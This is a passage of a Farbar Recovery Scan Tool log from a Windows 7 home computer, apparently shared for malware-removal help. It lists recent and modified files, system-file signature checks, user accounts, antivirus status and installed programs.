2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 10:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 09:57 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-01-27 17:27 - 2015-12-30 09:50 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-01-27 17:27 - 2015-12-30 09:49 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-01-27 17:27 - 2015-12-30 09:44 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-01-27 17:27 - 2015-12-30 09:43 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-01-27 17:27 - 2015-12-30 09:42 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-01-27 17:27 - 2015-12-30 09:42 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-01-27 17:27 - 2015-12-30 09:41 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-01-27 17:27 - 2015-12-30 09:41 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-01-27 17:27 - 2015-12-30 09:32 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-01-27 17:27 - 2015-12-30 09:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-01-27 17:27 - 2015-12-30 09:32 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-01-27 17:27 - 2015-12-30 09:32 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-01-27 17:27 - 2015-12-30 09:30 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-01-27 17:27 - 2015-12-30 09:30 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 09:30 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 09:30 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-01-27 17:27 - 2015-12-30 09:30 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-01-27 17:05 - 2016-01-27 18:06 - 00000000 ____D C:\d3e963c4f282e451103dfd00
2016-01-19 00:20 - 2015-10-08 15:22 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2016-01-19 00:20 - 2015-10-08 15:18 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2016-01-19 00:20 - 2015-10-08 15:18 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\kbdgeoqw.dll
2016-01-19 00:20 - 2015-10-08 15:18 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2016-01-19 00:20 - 2015-10-08 15:18 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2016-01-19 00:20 - 2015-10-08 15:18 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2016-01-19 00:20 - 2015-10-08 15:18 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2016-01-19 00:20 - 2015-10-08 15:17 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlsbres.dll
2016-01-19 00:20 - 2015-10-08 11:13 - 00419928 _____ C:\Windows\SysWOW64\locale.nls
2016-01-19 00:20 - 2015-10-08 10:52 - 00419928 _____ C:\Windows\system32\locale.nls
2016-01-13 03:51 - 2016-01-27 18:47 - 00000000 ____D C:\Users\Owner\.oracle_jre_usage
2016-01-13 03:51 - 2016-01-13 03:51 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Sun
2016-01-13 03:44 - 2016-01-13 03:44 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Oracle
2016-01-13 03:01 - 2016-01-13 03:01 - 00386096 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-01-13 03:00 - 2016-01-13 03:00 - 00043112 _____ (AVAST Software) C:\Windows\avastSS.scr
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-10 02:20 - 2014-05-30 01:39 - 00000000 ____D C:\FRST
2016-02-10 02:17 - 2009-07-13 20:45 - 00022464 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-02-10 02:17 - 2009-07-13 20:45 - 00022464 _____ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-02-10 02:09 - 2011-02-22 03:11 - 00000000 ____D C:\Users\Owner\AppData\Local\SoftThinks
2016-02-10 02:07 - 2011-03-19 03:59 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-02-10 02:06 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-02-05 19:27 - 2013-04-26 11:22 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-02-05 19:22 - 2011-03-19 03:59 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-02-04 15:29 - 2013-07-30 21:31 - 00000000 ____D C:\Windows\System32\Tasks\Norton Security Suite
2016-02-04 15:29 - 2011-08-25 00:39 - 00000000 ____D C:\Windows\pss
2016-02-04 15:29 - 2011-07-15 23:25 - 00000000 ___SD C:\Users\Owner\AppData\LocalLow\Temp
2016-02-04 15:20 - 2014-06-19 14:46 - 00004182 _____ C:\Windows\System32\Tasks\avast! Emergency Update
2016-02-04 00:25 - 2014-06-29 22:14 - 00000000 ____D C:\Users\Owner\Desktop\Wade
2016-02-03 01:17 - 2015-05-19 15:48 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-03 01:17 - 2011-03-19 03:59 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-03 00:57 - 2011-05-24 00:26 - 00000000 ____D C:\Users\Owner\AppData\Roaming\uTorrent
2016-02-03 00:30 - 2011-03-19 06:35 - 00003878 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000UA
2016-02-03 00:30 - 2011-03-19 06:35 - 00003482 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000Core
2016-02-03 00:30 - 2011-03-19 06:35 - 00000908 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000UA.job
2016-02-03 00:30 - 2011-03-19 06:35 - 00000856 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2923065098-2265594029-2962721977-1000Core.job
2016-02-03 00:30 - 2009-07-13 21:13 - 00783464 _____ C:\Windows\system32\PerfStringBackup.INI
2016-02-03 00:30 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\inf
2016-02-02 03:04 - 2009-07-13 21:08 - 00032590 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-02-01 22:28 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\rescache
2016-02-01 04:06 - 2011-02-22 03:12 - 00058408 _____ C:\Users\Owner\AppData\Local\GDIPFONTCACHEV1.DAT
2016-02-01 03:58 - 2011-03-21 18:17 - 00000000 ____D C:\Users\Owner\AppData\Roaming\SoftGrid Client
2016-01-31 21:08 - 2014-06-16 13:23 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2016-01-31 20:42 - 2009-07-13 20:45 - 00269128 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-31 20:41 - 2013-03-12 23:02 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-01-31 20:41 - 2013-03-12 23:02 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-01-31 20:36 - 2014-12-14 14:38 - 00000000 ____D C:\Windows\system32\appraiser
2016-01-31 20:36 - 2014-05-06 02:02 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-01-31 20:19 - 2011-03-21 18:17 - 00000000 ____D C:\Users\Owner\AppData\Local\SoftGrid Client
2016-01-31 20:13 - 2013-03-12 23:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-01-27 21:23 - 2011-02-22 12:01 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-01-27 21:06 - 2014-08-13 22:14 - 00000000 ____D C:\Users\Owner\Documents\WSOP.com
2016-01-27 18:46 - 2015-01-06 20:16 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2016-01-27 18:46 - 2015-01-06 20:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-27 18:44 - 2011-01-17 01:58 - 00000000 ____D C:\Program Files (x86)\Java
2016-01-27 18:42 - 2013-04-26 11:22 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-27 18:41 - 2013-04-26 11:22 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-27 18:41 - 2013-04-26 11:22 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-27 18:24 - 2015-01-06 20:16 - 00278624 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2016-01-27 17:05 - 2014-06-19 14:45 - 00464256 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2016-01-27 17:03 - 2014-06-19 14:45 - 01065208 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2016-01-14 11:20 - 2011-03-19 03:59 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-01-14 11:20 - 2011-03-19 03:59 - 00000000 ____D C:\ProgramData\Skype
2016-01-13 03:51 - 2011-02-22 03:11 - 00000000 ____D C:\Users\Owner
2016-01-13 03:44 - 2014-05-08 05:19 - 00000000 ____D C:\Users\Owner\AppData\Local\CrashDumps
2016-01-13 03:24 - 2014-12-28 18:08 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-01-13 03:11 - 2015-10-01 19:24 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\uTorrent
2016-01-13 03:03 - 2014-06-19 14:45 - 00097648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00273784 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00155304 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00093528 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00065224 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2016-01-13 03:01 - 2014-06-19 14:45 - 00028656 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2016-01-13 02:39 - 2015-04-05 16:56 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-01-13 02:39 - 2015-04-05 16:56 - 00000000 ___SD C:\Windows\system32\GWX
 
==================== Files in the root of some directories =======
 
2011-03-25 21:52 - 2014-04-25 06:40 - 0087552 _____ () C:\Users\Owner\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-03-10 23:35 - 2015-03-10 23:35 - 0007605 _____ () C:\Users\Owner\AppData\Local\Resmon.ResmonCfg
2014-03-11 17:32 - 2014-03-11 17:32 - 0000057 _____ () C:\ProgramData\Ament.ini
2011-03-19 04:00 - 2011-03-19 04:00 - 0000056 _____ () C:\ProgramData\ezsidmv.dat
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-01 22:20
 
==================== End of FRST.txt ============================
 
 
Addition:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-01-2016
Ran by Owner (2016-02-10 02:21:22)
Running from C:\Users\Owner\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2011-02-22 11:11:22)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2923065098-2265594029-2962721977-500 - Administrator - Disabled)
Guest (S-1-5-21-2923065098-2265594029-2962721977-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2923065098-2265594029-2962721977-1002 - Limited - Enabled)
Owner (S-1-5-21-2923065098-2265594029-2962721977-1000 - Administrator - Enabled) => C:\Users\Owner
postgres (S-1-5-21-2923065098-2265594029-2962721977-1005 - Limited - Enabled) => C:\Users\postgres
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 20.0.0.233 - Adobe Systems Incorporated)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.5 - Adobe Systems Incorporated)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.270 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.14) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.14 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM-x32\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.23 - Atheros Communications Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 11.1.2245 - AVAST Software)
Best Buy pc app (x32 Version: 3.1.0.0 - Best Buy) Hidden
Canon MX430 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX430_series) (Version:  - )
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell DataSafe Local Backup - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version:  - Dell)
Dell DataSafe Local Backup (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 9.4.47 - Dell)
Dell Dock (Version: 2.0 - Stardock Corporation) Hidden
Dell Driver Download Manager (HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\f031ef6ac137efc5) (Version: 2.1.0.0 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Getting Started Guide (HKLM-x32\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)
Dell Product Registration (HKLM-x32\...\{2A0F2CC5-3065-492C-8380-B03AA7106B1A}) (Version: 1.0.6 - Dell Inc.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 2.00.35 - Creative Technology Ltd)
Dropbox (HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Dropbox) (Version: 2.6.24 - Dropbox, Inc.)
Google Chrome (HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\Google Chrome) (Version: 48.0.2564.103 - Google Inc.)
Google Earth (HKLM-x32\...\{96AD3B61-EAE2-11E2-9E72-B8AC6F98CCE3}) (Version: 7.1.1.1888 - Google)
Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
HP Deskjet 1000 J110 series Basic Device Software (HKLM\...\{883B114D-BD3E-498F-9DAD-5E4A8E1C43BA}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Deskjet 1000 J110 series Help (HKLM-x32\...\{DDDFCC77-7F9C-45E9-B38E-721BA599BA0C}) (Version: 140.0.65.65 - Hewlett Packard)
HP Deskjet 1000 J110 series Product Improvement Study (HKLM\...\{1A570BFA-D775-47EE-8071-06E9559C14F5}) (Version: 22.50.231.0 - Hewlett-Packard Co.)
HP Officejet 6700 Basic Device Software (HKLM\...\{A1CFA587-90D4-4DE6-B200-68CC0F92252F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.3781 - HP Photo Creations Powered by RocketLife)
HP Update (HKLM-x32\...\{B0069CFA-5BB9-4C03-B1C6-89CE290E5AFE}) (Version: 5.002.006.003 - Hewlett-Packard)
iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
Intel WiMAX Tutorial (HKLM\...\{4F26C164-9373-4974-8F43-E0F2176AF937}) (Version: 1.5.3.1 - Intel Corporation)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2182 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{D16A2127-B927-4379-B153-3DEC091E4EEB}) (Version: 13.02.1000 - Intel Corporation)
Intel® PROSet/Wireless WiMAX Software (HKLM\...\{6548B189-BEA4-4041-80E0-AEB60548E046}) (Version: 2.03.3000 - Intel Corporation)
Internet Explorer (x32 Version: 8 - Microsoft Corporation) Hidden
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.40 - Irfan Skiljan)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218071F0}) (Version: 8.0.710.15 - Oracle Corporation)
Java 8 Update 72 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218072F0}) (Version: 8.0.720.15 - Oracle Corporation)
Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2923065098-2265594029-2962721977-1000\...\OneDriveSetup.exe) (Version: 17.0.4035.0328 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
MobileMe Control Panel (HKLM\...\{3C5E60F1-0821-4B07-97EA-84EB5A927CF6}) (Version: 3.1.6.0 - Apple Inc.)
MotoHelper MergeModules (x32 Version: 1.2.0 - Motorola) Hidden
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation)
NirSoft BlueScreenView (HKLM-x32\...\NirSoft BlueScreenView) (Version:  - )
Photo Story 3 for Windows (HKLM-x32\...\{4F41AD68-89F2-4262-A32C-2F70B01FCE9E}) (Version: 3.0.1115.11 - Microsoft Corporation)
PokerStars (HKLM-x32\...\PokerStars) (Version:  - PokerStars)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.6.2 - Dell Inc.)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6088 - Realtek Semiconductor Corp.)
Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Roxio Burn (HKLM-x32\...\{B2E47DE7-800B-40BB-BD1F-9F221C3AEE87}) (Version: 1.01 - Roxio)
SAMSUNG Mobile Modem Driver Set (HKLM\...\SAMSUNG Mobile Modem) (Version:  - )
Samsung Mobile phone USB driver Drive Software (HKLM\...\Samsung Mobile phone USB driver Drive) (Version:  - )
SAMSUNG Mobile USB Modem 1.0 Software (HKLM\...\SAMSUNG Mobile USB Modem 1.0) (Version:  - )
SAMSUNG Mobile USB Modem Software (HKLM\...\SAMSUNG Mobile USB Modem) (Version:  - )
